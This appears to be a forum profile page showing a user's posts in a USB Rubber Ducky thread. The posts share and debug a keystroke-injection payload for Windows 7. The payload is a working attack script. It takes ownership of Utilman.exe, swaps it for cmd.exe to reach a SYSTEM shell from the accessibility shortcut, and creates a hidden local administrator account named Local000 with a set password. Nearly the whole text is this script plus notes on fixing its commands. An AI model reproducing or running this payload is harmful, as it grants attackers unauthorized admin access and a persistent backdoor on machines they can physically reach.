Jump to content

mackwage

Active Members
 View Profile  See their activity

  • Posts

    17

  • Joined

  • Last visited

  • Days Won

    1

 Content Type 

Posts posted by mackwage

    [Payload] Utilman Exploit Payload

    in Classic USB Rubber Ducky

    Posted

    Thanks for the tip on the default delay.

    I am using Win7 Ultimate x64. I manually walked through every step of the script and typed the commands in CMD to view their behavior.

    icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T

    This command didn't actually seem to change the permissions unless adding the "/grant administrators:F /T". I did some Google searching on the command to understand more how it works which lead to me adding the last part.

    STRING xcopy cmd.exe util\

    I changed the syntax and added a backslash at the end. Without the backslash at the end, xcopy will prompt and ask if it's a file or a directory.

    STRING cd /util

    STRING ren cmd.exe Utilman.exe

    STRING cd ..

    I had trouble getting the rename command to interact correctly with the file unless that file was in my working directory.

    STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\

    I couldn't get xcopy to successfully copy from the util folder to the parent directory. I tried all sorts of variations and kept getting errors. So I just used the absolute path name instead.

    STRING rmdir /s /q util

    Without the /q trigger, rmdir will prompt you asking if you are sure you wish to delete it.

    I'm also looking for the correct icacls command to change Utilman.exe back to the default permissions at the end of the script. Pwning the machine or not, I'd hate to leave it vulnerable for someone else to play with. :P

    [Payload] Utilman Exploit Payload

    in Classic USB Rubber Ducky

    Posted

    Minus the above thing, I had to change the syntax of some of the commands to get it to work on Windows7... specifically the icacls, ren, rmdir commands. As it was, it would prompt for an answer to the ren and rmdir commands so I added the trigger to suppress those. Also, I had to change the icacls syntax to allow full control of Utilman.exe. Then I added a short delay after each GUI command.

    DELAY 200

    GUI r

    DELAY 50

    STRING cmd

    DELAY 50

    ENTER

    DELAY 50

    STRING takeown /f "%systemroot%\System32\Utilman.exe"

    ENTER

    DELAY 50

    STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T

    ENTER

    DELAY 50

    STRING cd %systemroot%\System32

    ENTER

    DELAY 50

    STRING mkdir util

    ENTER

    STRING xcopy cmd.exe util\

    ENTER

    DELAY 50

    STRING ren Utilman.exe Utilman.exe.bak

    ENTER

    DELAY 50

    STRING cd /util

    ENTER

    DELAY 50

    STRING ren cmd.exe Utilman.exe

    ENTER

    DELAY 50

    STRING cd ..

    ENTER

    DELAY 50

    STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\

    ENTER

    DELAY 50

    STRING rmdir /s /q util

    ENTER

    DELAY 50

    STRING exit

    ENTER

    DELAY 50

    GUI u

    STRING net user Local000 /add

    ENTER

    DELAY 50

    STRING net localgroup administrators Local000 /add

    ENTER

    DELAY 50

    STRING exit

    ENTER

    DELAY 50

    GUI r

    STRING cmd

    ENTER

    DELAY 50

    STRING cd "%systemroot%\System32"

    ENTER

    DELAY 50

    STRING delete Utilman.exe

    ENTER

    DELAY 50

    STRING y

    ENTER

    DELAY 50

    STRING ren Utilman.exe.bak Utilman.exe

    ENTER

    DELAY 50

    STRING exit

    ENTER

    GUI r

    DELAY 500

    STRING cmd

    DELAY 500

    ENTER

    DELAY 200

    STRING net user Local000 *

    ENTER

    STRING hak5

    ENTER

    STRING hak5

    ENTER

    STRING exit

    ENTER

×
×
  • Create New...